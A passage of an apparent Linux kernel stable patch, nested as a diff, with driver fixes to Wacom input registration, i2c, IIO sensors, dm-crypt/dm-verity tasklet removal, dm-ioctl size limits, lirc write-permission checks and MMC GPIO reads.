+ 
+ 	error = wacom_setup_pad_input_capabilities(pad_input_dev, wacom_wac);
+@@ -2123,7 +2115,34 @@ static int wacom_register_inputs(struct wacom *wacom)
+ 		input_free_device(pad_input_dev);
+ 		wacom_wac->pad_input = NULL;
+ 		pad_input_dev = NULL;
+-	} else {
++	}
++
++	return 0;
++}
++
++static int wacom_register_inputs(struct wacom *wacom)
++{
++	struct input_dev *pen_input_dev, *touch_input_dev, *pad_input_dev;
++	struct wacom_wac *wacom_wac = &(wacom->wacom_wac);
++	int error = 0;
++
++	pen_input_dev = wacom_wac->pen_input;
++	touch_input_dev = wacom_wac->touch_input;
++	pad_input_dev = wacom_wac->pad_input;
++
++	if (pen_input_dev) {
++		error = input_register_device(pen_input_dev);
++		if (error)
++			goto fail;
++	}
++
++	if (touch_input_dev) {
++		error = input_register_device(touch_input_dev);
++		if (error)
++			goto fail;
++	}
++
++	if (pad_input_dev) {
+ 		error = input_register_device(pad_input_dev);
+ 		if (error)
+ 			goto fail;
+@@ -2379,6 +2398,20 @@ static int wacom_parse_and_register(struct wacom *wacom, bool wireless)
+ 			goto fail;
+ 	}
+ 
++	error = wacom_setup_inputs(wacom);
++	if (error)
++		goto fail;
++
++	if (features->type == HID_GENERIC)
++		connect_mask |= HID_CONNECT_DRIVER;
++
++	/* Regular HID work starts now */
++	error = hid_hw_start(hdev, connect_mask);
++	if (error) {
++		hid_err(hdev, "hw start failed\n");
++		goto fail;
++	}
++
+ 	error = wacom_register_inputs(wacom);
+ 	if (error)
+ 		goto fail;
+@@ -2393,16 +2426,6 @@ static int wacom_parse_and_register(struct wacom *wacom, bool wireless)
+ 			goto fail;
+ 	}
+ 
+-	if (features->type == HID_GENERIC)
+-		connect_mask |= HID_CONNECT_DRIVER;
+-
+-	/* Regular HID work starts now */
+-	error = hid_hw_start(hdev, connect_mask);
+-	if (error) {
+-		hid_err(hdev, "hw start failed\n");
+-		goto fail;
+-	}
+-
+ 	if (!wireless) {
+ 		/* Note that if query fails it is not a hard failure */
+ 		wacom_query_tablet_data(wacom);
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 165ed872fa4e7..53235b276bb24 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -2571,7 +2571,14 @@ static void wacom_wac_pen_report(struct hid_device *hdev,
+ 				wacom_wac->hid_data.tipswitch);
+ 		input_report_key(input, wacom_wac->tool[0], sense);
+ 		if (wacom_wac->serial[0]) {
+-			input_event(input, EV_MSC, MSC_SERIAL, wacom_wac->serial[0]);
++			/*
++			 * xf86-input-wacom does not accept a serial number
++			 * of '0'. Report the low 32 bits if possible, but
++			 * if they are zero, report the upper ones instead.
++			 */
++			__u32 serial_lo = wacom_wac->serial[0] & 0xFFFFFFFFu;
++			__u32 serial_hi = wacom_wac->serial[0] >> 32;
++			input_event(input, EV_MSC, MSC_SERIAL, (int)(serial_lo ? serial_lo : serial_hi));
+ 			input_report_abs(input, ABS_MISC, sense ? id : 0);
+ 		}
+ 
+diff --git a/drivers/i2c/busses/Makefile b/drivers/i2c/busses/Makefile
+index e73cdb1d2b5a8..784a803279d99 100644
+--- a/drivers/i2c/busses/Makefile
++++ b/drivers/i2c/busses/Makefile
+@@ -89,10 +89,8 @@ obj-$(CONFIG_I2C_NPCM)		+= i2c-npcm7xx.o
+ obj-$(CONFIG_I2C_OCORES)	+= i2c-ocores.o
+ obj-$(CONFIG_I2C_OMAP)		+= i2c-omap.o
+ obj-$(CONFIG_I2C_OWL)		+= i2c-owl.o
+-i2c-pasemi-objs := i2c-pasemi-core.o i2c-pasemi-pci.o
+-obj-$(CONFIG_I2C_PASEMI)	+= i2c-pasemi.o
+-i2c-apple-objs := i2c-pasemi-core.o i2c-pasemi-platform.o
+-obj-$(CONFIG_I2C_APPLE)	+= i2c-apple.o
++obj-$(CONFIG_I2C_PASEMI)	+= i2c-pasemi-core.o i2c-pasemi-pci.o
++obj-$(CONFIG_I2C_APPLE)		+= i2c-pasemi-core.o i2c-pasemi-platform.o
+ obj-$(CONFIG_I2C_PCA_PLATFORM)	+= i2c-pca-platform.o
+ obj-$(CONFIG_I2C_PNX)		+= i2c-pnx.o
+ obj-$(CONFIG_I2C_PXA)		+= i2c-pxa.o
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index 3159ffbb77a20..9a4e9bf304c28 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -500,11 +500,10 @@ static int i801_block_transaction_by_block(struct i801_priv *priv,
+ 	/* Set block buffer mode */
+ 	outb_p(inb_p(SMBAUXCTL(priv)) | SMBAUXCTL_E32B, SMBAUXCTL(priv));
+ 
+-	inb_p(SMBHSTCNT(priv)); /* reset the data buffer index */
+-
+ 	if (read_write == I2C_SMBUS_WRITE) {
+ 		len = data->block[0];
+ 		outb_p(len, SMBHSTDAT0(priv));
++		inb_p(SMBHSTCNT(priv));	/* reset the data buffer index */
+ 		for (i = 0; i < len; i++)
+ 			outb_p(data->block[i+1], SMBBLKDAT(priv));
+ 	}
+@@ -520,6 +519,7 @@ static int i801_block_transaction_by_block(struct i801_priv *priv,
+ 			return -EPROTO;
+ 
+ 		data->block[0] = len;
++		inb_p(SMBHSTCNT(priv));	/* reset the data buffer index */
+ 		for (i = 0; i < len; i++)
+ 			data->block[i + 1] = inb_p(SMBBLKDAT(priv));
+ 	}
+diff --git a/drivers/i2c/busses/i2c-pasemi-core.c b/drivers/i2c/busses/i2c-pasemi-core.c
+index 9028ffb58cc07..f297e41352e7a 100644
+--- a/drivers/i2c/busses/i2c-pasemi-core.c
++++ b/drivers/i2c/busses/i2c-pasemi-core.c
+@@ -356,3 +356,8 @@ int pasemi_i2c_common_probe(struct pasemi_smbus *smbus)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(pasemi_i2c_common_probe);
++
++MODULE_LICENSE("GPL");
++MODULE_AUTHOR("Olof Johansson <olof@lixom.net>");
++MODULE_DESCRIPTION("PA Semi PWRficient SMBus driver");
+diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
+index 8fce98bb77ff9..75b9c3f26bba6 100644
+--- a/drivers/i2c/busses/i2c-qcom-geni.c
++++ b/drivers/i2c/busses/i2c-qcom-geni.c
+@@ -605,20 +605,20 @@ static int geni_i2c_gpi_xfer(struct geni_i2c_dev *gi2c, struct i2c_msg msgs[], i
+ 
+ 		peripheral.addr = msgs[i].addr;
+ 
++		ret =  geni_i2c_gpi(gi2c, &msgs[i], &config,
++				    &tx_addr, &tx_buf, I2C_WRITE, gi2c->tx_c);
++		if (ret)
++			goto err;
++
+ 		if (msgs[i].flags & I2C_M_RD) {
+ 			ret =  geni_i2c_gpi(gi2c, &msgs[i], &config,
+ 					    &rx_addr, &rx_buf, I2C_READ, gi2c->rx_c);
+ 			if (ret)
+ 				goto err;
+-		}
+-
+-		ret =  geni_i2c_gpi(gi2c, &msgs[i], &config,
+-				    &tx_addr, &tx_buf, I2C_WRITE, gi2c->tx_c);
+-		if (ret)
+-			goto err;
+ 
+-		if (msgs[i].flags & I2C_M_RD)
+ 			dma_async_issue_pending(gi2c->rx_c);
++		}
++
+ 		dma_async_issue_pending(gi2c->tx_c);
+ 
+ 		timeout = wait_for_completion_timeout(&gi2c->done, XFER_TIMEOUT);
+diff --git a/drivers/iio/accel/Kconfig b/drivers/iio/accel/Kconfig
+index ffac66db7ac92..1f34747a68bfe 100644
+--- a/drivers/iio/accel/Kconfig
++++ b/drivers/iio/accel/Kconfig
+@@ -219,10 +219,12 @@ config BMA400
+ 
+ config BMA400_I2C
+ 	tristate
++	select REGMAP_I2C
+ 	depends on BMA400
+ 
+ config BMA400_SPI
+ 	tristate
++	select REGMAP_SPI
+ 	depends on BMA400
+ 
+ config BMC150_ACCEL
+diff --git a/drivers/iio/imu/bno055/Kconfig b/drivers/iio/imu/bno055/Kconfig
+index 83e53acfbe880..c7f5866a177d9 100644
+--- a/drivers/iio/imu/bno055/Kconfig
++++ b/drivers/iio/imu/bno055/Kconfig
+@@ -8,6 +8,7 @@ config BOSCH_BNO055
+ config BOSCH_BNO055_SERIAL
+ 	tristate "Bosch BNO055 attached via UART"
+ 	depends on SERIAL_DEV_BUS
++	select REGMAP
+ 	select BOSCH_BNO055
+ 	help
+ 	  Enable this to support Bosch BNO055 IMUs attached via UART.
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index c9614982cb671..a2f8278f00856 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -1601,10 +1601,13 @@ static int iio_device_register_sysfs(struct iio_dev *indio_dev)
+ 	ret = iio_device_register_sysfs_group(indio_dev,
+ 					      &iio_dev_opaque->chan_attr_group);
+ 	if (ret)
+-		goto error_clear_attrs;
++		goto error_free_chan_attrs;
+ 
+ 	return 0;
+ 
++error_free_chan_attrs:
++	kfree(iio_dev_opaque->chan_attr_group.attrs);
++	iio_dev_opaque->chan_attr_group.attrs = NULL;
+ error_clear_attrs:
+ 	iio_free_chan_devattr_list(&iio_dev_opaque->channel_attr_list);
+ 
+diff --git a/drivers/iio/light/hid-sensor-als.c b/drivers/iio/light/hid-sensor-als.c
+index 5a1a625d8d16d..85097b769c209 100644
+--- a/drivers/iio/light/hid-sensor-als.c
++++ b/drivers/iio/light/hid-sensor-als.c
+@@ -228,6 +228,7 @@ static int als_capture_sample(struct hid_sensor_hub_device *hsdev,
+ 	case HID_USAGE_SENSOR_TIME_TIMESTAMP:
+ 		als_state->timestamp = hid_sensor_convert_timestamp(&als_state->common_attributes,
+ 								    *(s64 *)raw_data);
++		ret = 0;
+ 		break;
+ 	default:
+ 		break;
+diff --git a/drivers/iio/magnetometer/rm3100-core.c b/drivers/iio/magnetometer/rm3100-core.c
+index 69938204456f8..42b70cd42b393 100644
+--- a/drivers/iio/magnetometer/rm3100-core.c
++++ b/drivers/iio/magnetometer/rm3100-core.c
+@@ -530,6 +530,7 @@ int rm3100_common_probe(struct device *dev, struct regmap *regmap, int irq)
+ 	struct rm3100_data *data;
+ 	unsigned int tmp;
+ 	int ret;
++	int samp_rate_index;
+ 
+ 	indio_dev = devm_iio_device_alloc(dev, sizeof(*data));
+ 	if (!indio_dev)
+@@ -586,9 +587,14 @@ int rm3100_common_probe(struct device *dev, struct regmap *regmap, int irq)
+ 	ret = regmap_read(regmap, RM3100_REG_TMRC, &tmp);
+ 	if (ret < 0)
+ 		return ret;
++
++	samp_rate_index = tmp - RM3100_TMRC_OFFSET;
++	if (samp_rate_index < 0 || samp_rate_index >=  RM3100_SAMP_NUM) {
++		dev_err(dev, "The value read from RM3100_REG_TMRC is invalid!\n");
++		return -EINVAL;
++	}
+ 	/* Initializing max wait time, which is double conversion time. */
+-	data->conversion_time = rm3100_samp_rates[tmp - RM3100_TMRC_OFFSET][2]
+-				* 2;
++	data->conversion_time = rm3100_samp_rates[samp_rate_index][2] * 2;
+ 
+ 	/* Cycle count values may not be what we want. */
+ 	if ((tmp - RM3100_TMRC_OFFSET) == 0)
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 4859b99d54fc2..01faec6ea5285 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -2845,6 +2845,13 @@ static struct ib_mr *irdma_reg_user_mr(struct ib_pd *pd, u64 start, u64 len,
+ 
+ 	switch (req.reg_type) {
+ 	case IRDMA_MEMREG_TYPE_QP:
++		/* iWarp: Catch page not starting on OS page boundary */
++		if (!rdma_protocol_roce(&iwdev->ibdev, 1) &&
++		    ib_umem_offset(iwmr->region)) {
++			err = -EINVAL;
++			goto error;
++		}
++
+ 		total = req.sq_pages + req.rq_pages + shadow_pgcnt;
+ 		if (total > iwmr->page_cnt) {
+ 			err = -EINVAL;
+diff --git a/drivers/interconnect/qcom/sc8180x.c b/drivers/interconnect/qcom/sc8180x.c
+index 83461e31774ec..d9ee193fb18bd 100644
+--- a/drivers/interconnect/qcom/sc8180x.c
++++ b/drivers/interconnect/qcom/sc8180x.c
+@@ -1387,6 +1387,7 @@ static struct qcom_icc_bcm bcm_mm0 = {
+ 
+ static struct qcom_icc_bcm bcm_co0 = {
+ 	.name = "CO0",
++	.keepalive = true,
+ 	.num_nodes = 1,
+ 	.nodes = { &slv_qns_cdsp_mem_noc }
+ };
+diff --git a/drivers/irqchip/irq-brcmstb-l2.c b/drivers/irqchip/irq-brcmstb-l2.c
+index 091b0fe7e3242..5d4421f75b43a 100644
+--- a/drivers/irqchip/irq-brcmstb-l2.c
++++ b/drivers/irqchip/irq-brcmstb-l2.c
+@@ -2,7 +2,7 @@
+ /*
+  * Generic Broadcom Set Top Box Level 2 Interrupt controller driver
+  *
+- * Copyright (C) 2014-2017 Broadcom
++ * Copyright (C) 2014-2024 Broadcom
+  */
+ 
+ #define pr_fmt(fmt)	KBUILD_MODNAME	": " fmt
+@@ -113,6 +113,9 @@ static void brcmstb_l2_intc_irq_handle(struct irq_desc *desc)
+ 		generic_handle_domain_irq(b->domain, irq);
+ 	} while (status);
+ out:
++	/* Don't ack parent before all device writes are done */
++	wmb();
++
+ 	chained_irq_exit(chip, desc);
+ }
+ 
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index 8956881503d9a..b83b39e93e1a9 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -3805,8 +3805,9 @@ static int its_vpe_set_affinity(struct irq_data *d,
+ 				bool force)
+ {
+ 	struct its_vpe *vpe = irq_data_get_irq_chip_data(d);
+-	int from, cpu = cpumask_first(mask_val);
++	struct cpumask common, *table_mask;
+ 	unsigned long flags;
++	int from, cpu;
+ 
+ 	/*
+ 	 * Changing affinity is mega expensive, so let's be as lazy as
+@@ -3822,19 +3823,22 @@ static int its_vpe_set_affinity(struct irq_data *d,
+ 	 * taken on any vLPI handling path that evaluates vpe->col_idx.
+ 	 */
+ 	from = vpe_to_cpuid_lock(vpe, &flags);
+-	if (from == cpu)
+-		goto out;
+-
+-	vpe->col_idx = cpu;
++	table_mask = gic_data_rdist_cpu(from)->vpe_table_mask;
+ 
+ 	/*
+-	 * GICv4.1 allows us to skip VMOVP if moving to a cpu whose RD
+-	 * is sharing its VPE table with the current one.
++	 * If we are offered another CPU in the same GICv4.1 ITS
++	 * affinity, pick this one. Otherwise, any CPU will do.
+ 	 */
+-	if (gic_data_rdist_cpu(cpu)->vpe_table_mask &&
+-	    cpumask_test_cpu(from, gic_data_rdist_cpu(cpu)->vpe_table_mask))
++	if (table_mask && cpumask_and(&common, mask_val, table_mask))
++		cpu = cpumask_test_cpu(from, &common) ? from : cpumask_first(&common);
++	else
++		cpu = cpumask_first(mask_val);
++
++	if (from == cpu)
+ 		goto out;
+ 
++	vpe->col_idx = cpu;
++
+ 	its_send_vmovp(vpe);
+ 	its_vpe_db_proxy_move(vpe, from, cpu);
+ 
+diff --git a/drivers/irqchip/irq-loongson-eiointc.c b/drivers/irqchip/irq-loongson-eiointc.c
+index 3d99b8bdd8ef1..de115ee6e9ec7 100644
+--- a/drivers/irqchip/irq-loongson-eiointc.c
++++ b/drivers/irqchip/irq-loongson-eiointc.c
+@@ -242,7 +242,7 @@ static int eiointc_domain_alloc(struct irq_domain *domain, unsigned int virq,
+ 	int ret;
+ 	unsigned int i, type;
+ 	unsigned long hwirq = 0;
+-	struct eiointc *priv = domain->host_data;
++	struct eiointc_priv *priv = domain->host_data;
+ 
+ 	ret = irq_domain_translate_onecell(domain, arg, &hwirq, &type);
+ 	if (ret)
+diff --git a/drivers/md/dm-core.h b/drivers/md/dm-core.h
+index 71dcd8fd4050a..6314210d36971 100644
+--- a/drivers/md/dm-core.h
++++ b/drivers/md/dm-core.h
+@@ -21,6 +21,8 @@
+ #include "dm-ima.h"
+ 
+ #define DM_RESERVED_MAX_IOS		1024
++#define DM_MAX_TARGETS			1048576
++#define DM_MAX_TARGET_PARAMS		1024
+ 
+ struct dm_io;
+ 
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index ff515437d81e7..0e6068ee783e7 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -72,10 +72,8 @@ struct dm_crypt_io {
+ 	struct bio *base_bio;
+ 	u8 *integrity_metadata;
+ 	bool integrity_metadata_from_pool:1;
+-	bool in_tasklet:1;
+ 
+ 	struct work_struct work;
+-	struct tasklet_struct tasklet;
+ 
+ 	struct convert_context ctx;
+ 
+@@ -1729,7 +1727,6 @@ static void crypt_io_init(struct dm_crypt_io *io, struct crypt_config *cc,
+ 	io->ctx.r.req = NULL;
+ 	io->integrity_metadata = NULL;
+ 	io->integrity_metadata_from_pool = false;
+-	io->in_tasklet = false;
+ 	atomic_set(&io->io_pending, 0);
+ }
+ 
+@@ -1738,12 +1735,6 @@ static void crypt_inc_pending(struct dm_crypt_io *io)
+ 	atomic_inc(&io->io_pending);
+ }
+ 
+-static void kcryptd_io_bio_endio(struct work_struct *work)
+-{
+-	struct dm_crypt_io *io = container_of(work, struct dm_crypt_io, work);
+-	bio_endio(io->base_bio);
+-}
+-
+ /*
+  * One of the bios was finished. Check for completion of
+  * the whole request and correctly clean up the buffer.
+@@ -1767,20 +1758,6 @@ static void crypt_dec_pending(struct dm_crypt_io *io)
+ 
+ 	base_bio->bi_status = error;
+ 
+-	/*
+-	 * If we are running this function from our tasklet,
+-	 * we can't call bio_endio() here, because it will call
+-	 * clone_endio() from dm.c, which in turn will
+-	 * free the current struct dm_crypt_io structure with
+-	 * our tasklet. In this case we need to delay bio_endio()
+-	 * execution to after the tasklet is done and dequeued.
+-	 */
+-	if (io->in_tasklet) {
+-		INIT_WORK(&io->work, kcryptd_io_bio_endio);
+-		queue_work(cc->io_queue, &io->work);
+-		return;
+-	}
+-
+ 	bio_endio(base_bio);
+ }
+ 
+@@ -2213,11 +2190,6 @@ static void kcryptd_crypt(struct work_struct *work)
+ 		kcryptd_crypt_write_convert(io);
+ }
+ 
+-static void kcryptd_crypt_tasklet(unsigned long work)
+-{
+-	kcryptd_crypt((struct work_struct *)work);
+-}
+-
+ static void kcryptd_queue_crypt(struct dm_crypt_io *io)
+ {
+ 	struct crypt_config *cc = io->cc;
+@@ -2229,15 +2201,10 @@ static void kcryptd_queue_crypt(struct dm_crypt_io *io)
+ 		 * irqs_disabled(): the kernel may run some IO completion from the idle thread, but
+ 		 * it is being executed with irqs disabled.
+ 		 */
+-		if (in_hardirq() || irqs_disabled()) {
+-			io->in_tasklet = true;
+-			tasklet_init(&io->tasklet, kcryptd_crypt_tasklet, (unsigned long)&io->work);
+-			tasklet_schedule(&io->tasklet);
++		if (!(in_hardirq() || irqs_disabled())) {
++			kcryptd_crypt(&io->work);
+ 			return;
+ 		}
+-
+-		kcryptd_crypt(&io->work);
+-		return;
+ 	}
+ 
+ 	INIT_WORK(&io->work, kcryptd_crypt);
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 206e6ce554dc7..4376754816abe 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1877,7 +1877,8 @@ static int copy_params(struct dm_ioctl __user *user, struct dm_ioctl *param_kern
+ 			   minimum_data_size - sizeof(param_kernel->version)))
+ 		return -EFAULT;
+ 
+-	if (param_kernel->data_size < minimum_data_size) {
++	if (unlikely(param_kernel->data_size < minimum_data_size) ||
++	    unlikely(param_kernel->data_size > DM_MAX_TARGETS * DM_MAX_TARGET_PARAMS)) {
+ 		DMERR("Invalid data size in the ioctl structure: %u",
+ 		      param_kernel->data_size);
+ 		return -EINVAL;
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index dac6a5f25f2be..e0367a672eabf 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -128,7 +128,12 @@ static int alloc_targets(struct dm_table *t, unsigned int num)
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+ 		    unsigned int num_targets, struct mapped_device *md)
+ {
+-	struct dm_table *t = kzalloc(sizeof(*t), GFP_KERNEL);
++	struct dm_table *t;
++
++	if (num_targets > DM_MAX_TARGETS)
++		return -EOVERFLOW;
++
++	t = kzalloc(sizeof(*t), GFP_KERNEL);
+ 
+ 	if (!t)
+ 		return -ENOMEM;
+@@ -143,7 +148,7 @@ int dm_table_create(struct dm_table **result, fmode_t mode,
+ 
+ 	if (!num_targets) {
+ 		kfree(t);
+-		return -ENOMEM;
++		return -EOVERFLOW;
+ 	}
+ 
+ 	if (alloc_targets(t, num_targets)) {
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 24df610a2c438..4669923f4cfb4 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -634,23 +634,6 @@ static void verity_work(struct work_struct *w)
+ 	verity_finish_io(io, errno_to_blk_status(verity_verify_io(io)));
+ }
+ 
+-static void verity_tasklet(unsigned long data)
+-{
+-	struct dm_verity_io *io = (struct dm_verity_io *)data;
+-	int err;
+-
+-	io->in_tasklet = true;
+-	err = verity_verify_io(io);
+-	if (err == -EAGAIN || err == -ENOMEM) {
+-		/* fallback to retrying with work-queue */
+-		INIT_WORK(&io->work, verity_work);
+-		queue_work(io->v->verify_wq, &io->work);
+-		return;
+-	}
+-
+-	verity_finish_io(io, errno_to_blk_status(err));
+-}
+-
+ static void verity_end_io(struct bio *bio)
+ {
+ 	struct dm_verity_io *io = bio->bi_private;
+@@ -663,13 +646,8 @@ static void verity_end_io(struct bio *bio)
+ 		return;
+ 	}
+ 
+-	if (static_branch_unlikely(&use_tasklet_enabled) && io->v->use_tasklet) {
+-		tasklet_init(&io->tasklet, verity_tasklet, (unsigned long)io);
+-		tasklet_schedule(&io->tasklet);
+-	} else {
+-		INIT_WORK(&io->work, verity_work);
+-		queue_work(io->v->verify_wq, &io->work);
+-	}
++	INIT_WORK(&io->work, verity_work);
++	queue_work(io->v->verify_wq, &io->work);
+ }
+ 
+ /*
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index f9d522c870e61..f3f6070084196 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -83,7 +83,6 @@ struct dm_verity_io {
+ 	struct bvec_iter iter;
+ 
+ 	struct work_struct work;
+-	struct tasklet_struct tasklet;
+ 
+ 	/*
+ 	 * Three variably-size fields follow this struct:
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 3ccf1920682cb..c7efe15229514 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -963,9 +963,10 @@ void md_super_write(struct mddev *mddev, struct md_rdev *rdev,
+ 		return;
+ 
+ 	bio = bio_alloc_bioset(rdev->meta_bdev ? rdev->meta_bdev : rdev->bdev,
+-			       1,
+-			       REQ_OP_WRITE | REQ_SYNC | REQ_PREFLUSH | REQ_FUA,
+-			       GFP_NOIO, &mddev->sync_set);
++			      1,
++			      REQ_OP_WRITE | REQ_SYNC | REQ_IDLE | REQ_META
++				  | REQ_PREFLUSH | REQ_FUA,
++			      GFP_NOIO, &mddev->sync_set);
+ 
+ 	atomic_inc(&rdev->nr_pending);
+ 
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+index aeb6bb63667eb..41abb18b00acb 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+@@ -559,7 +559,7 @@ static int rkisp1_probe(struct platform_device *pdev)
+ 				rkisp1->irqs[il] = irq;
+ 		}
+ 
+-		ret = devm_request_irq(dev, irq, info->isrs[i].isr, 0,
++		ret = devm_request_irq(dev, irq, info->isrs[i].isr, IRQF_SHARED,
+ 				       dev_driver_string(dev), dev);
+ 		if (ret) {
+ 			dev_err(dev, "request irq failed: %d\n", ret);
+diff --git a/drivers/media/rc/bpf-lirc.c b/drivers/media/rc/bpf-lirc.c
+index fe17c7f98e810..52d82cbe7685f 100644
+--- a/drivers/media/rc/bpf-lirc.c
++++ b/drivers/media/rc/bpf-lirc.c
+@@ -253,7 +253,7 @@ int lirc_prog_attach(const union bpf_attr *attr, struct bpf_prog *prog)
+ 	if (attr->attach_flags)
+ 		return -EINVAL;
+ 
+-	rcdev = rc_dev_get_from_fd(attr->target_fd);
++	rcdev = rc_dev_get_from_fd(attr->target_fd, true);
+ 	if (IS_ERR(rcdev))
+ 		return PTR_ERR(rcdev);
+ 
+@@ -278,7 +278,7 @@ int lirc_prog_detach(const union bpf_attr *attr)
+ 	if (IS_ERR(prog))
+ 		return PTR_ERR(prog);
+ 
+-	rcdev = rc_dev_get_from_fd(attr->target_fd);
++	rcdev = rc_dev_get_from_fd(attr->target_fd, true);
+ 	if (IS_ERR(rcdev)) {
+ 		bpf_prog_put(prog);
+ 		return PTR_ERR(rcdev);
+@@ -303,7 +303,7 @@ int lirc_prog_query(const union bpf_attr *attr, union bpf_attr __user *uattr)
+ 	if (attr->query.query_flags)
+ 		return -EINVAL;
+ 
+-	rcdev = rc_dev_get_from_fd(attr->query.target_fd);
++	rcdev = rc_dev_get_from_fd(attr->query.target_fd, false);
+ 	if (IS_ERR(rcdev))
+ 		return PTR_ERR(rcdev);
+ 
+diff --git a/drivers/media/rc/ir_toy.c b/drivers/media/rc/ir_toy.c
+index 1968067092594..69e630d85262f 100644
+--- a/drivers/media/rc/ir_toy.c
++++ b/drivers/media/rc/ir_toy.c
+@@ -332,6 +332,7 @@ static int irtoy_tx(struct rc_dev *rc, uint *txbuf, uint count)
+ 			    sizeof(COMMAND_SMODE_EXIT), STATE_COMMAND_NO_RESP);
+ 	if (err) {
+ 		dev_err(irtoy->dev, "exit sample mode: %d\n", err);
++		kfree(buf);
+ 		return err;
+ 	}
+ 
+@@ -339,6 +340,7 @@ static int irtoy_tx(struct rc_dev *rc, uint *txbuf, uint count)
+ 			    sizeof(COMMAND_SMODE_ENTER), STATE_COMMAND);
+ 	if (err) {
+ 		dev_err(irtoy->dev, "enter sample mode: %d\n", err);
++		kfree(buf);
+ 		return err;
+ 	}
+ 
+diff --git a/drivers/media/rc/lirc_dev.c b/drivers/media/rc/lirc_dev.c
+index 184e0b35744f3..adb8c794a2d7b 100644
+--- a/drivers/media/rc/lirc_dev.c
++++ b/drivers/media/rc/lirc_dev.c
+@@ -814,7 +814,7 @@ void __exit lirc_dev_exit(void)
+ 	unregister_chrdev_region(lirc_base_dev, RC_DEV_MAX);
+ }
+ 
+-struct rc_dev *rc_dev_get_from_fd(int fd)
++struct rc_dev *rc_dev_get_from_fd(int fd, bool write)
+ {
+ 	struct fd f = fdget(fd);
+ 	struct lirc_fh *fh;
+@@ -828,6 +828,9 @@ struct rc_dev *rc_dev_get_from_fd(int fd)
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 
++	if (write && !(f.file->f_mode & FMODE_WRITE))
++		return ERR_PTR(-EPERM);
++
+ 	fh = f.file->private_data;
+ 	dev = fh->rc;
+ 
+diff --git a/drivers/media/rc/rc-core-priv.h b/drivers/media/rc/rc-core-priv.h
+index ef1e95e1af7fc..7df949fc65e2b 100644
+--- a/drivers/media/rc/rc-core-priv.h
++++ b/drivers/media/rc/rc-core-priv.h
+@@ -325,7 +325,7 @@ void lirc_raw_event(struct rc_dev *dev, struct ir_raw_event ev);
+ void lirc_scancode_event(struct rc_dev *dev, struct lirc_scancode *lsc);
+ int lirc_register(struct rc_dev *dev);
+ void lirc_unregister(struct rc_dev *dev);
+-struct rc_dev *rc_dev_get_from_fd(int fd);
++struct rc_dev *rc_dev_get_from_fd(int fd, bool write);
+ #else
+ static inline int lirc_dev_init(void) { return 0; }
+ static inline void lirc_dev_exit(void) {}
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index cc57cc8204328..69cc24962706c 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -1990,7 +1990,7 @@ static int fastrpc_cb_remove(struct platform_device *pdev)
+ 	int i;
+ 
+ 	spin_lock_irqsave(&cctx->lock, flags);
+-	for (i = 1; i < FASTRPC_MAX_SESSIONS; i++) {
++	for (i = 0; i < FASTRPC_MAX_SESSIONS; i++) {
+ 		if (cctx->session[i].sid == sess->sid) {
+ 			cctx->session[i].valid = false;
+ 			cctx->sesscount--;
+diff --git a/drivers/mmc/core/slot-gpio.c b/drivers/mmc/core/slot-gpio.c
+index dd2a4b6ab6adb..e3c69c6b85a6c 100644
+--- a/drivers/mmc/core/slot-gpio.c
++++ b/drivers/mmc/core/slot-gpio.c
+@@ -62,11 +62,15 @@ int mmc_gpio_alloc(struct mmc_host *host)
+ int mmc_gpio_get_ro(struct mmc_host *host)
+ {
+ 	struct mmc_gpio *ctx = host->slot.handler_priv;
++	int cansleep;
+ 
+ 	if (!ctx || !ctx->ro_gpio)
+ 		return -ENOSYS;
+ 
+-	return gpiod_get_value_cansleep(ctx->ro_gpio);
++	cansleep = gpiod_cansleep(ctx->ro_gpio);
++	return cansleep ?
++		gpiod_get_value_cansleep(ctx->ro_gpio) :
++		gpiod_get_value(ctx->ro_gpio);
+ }
+ EXPORT_SYMBOL(mmc_gpio_get_ro);
+ 
+diff --git a/drivers/mmc/host/sdhci-pci-o2micro.c b/drivers/mmc/host/sdhci-pci-o2micro.c
+index bca1d095b7597..24bb0e9809e76 100644
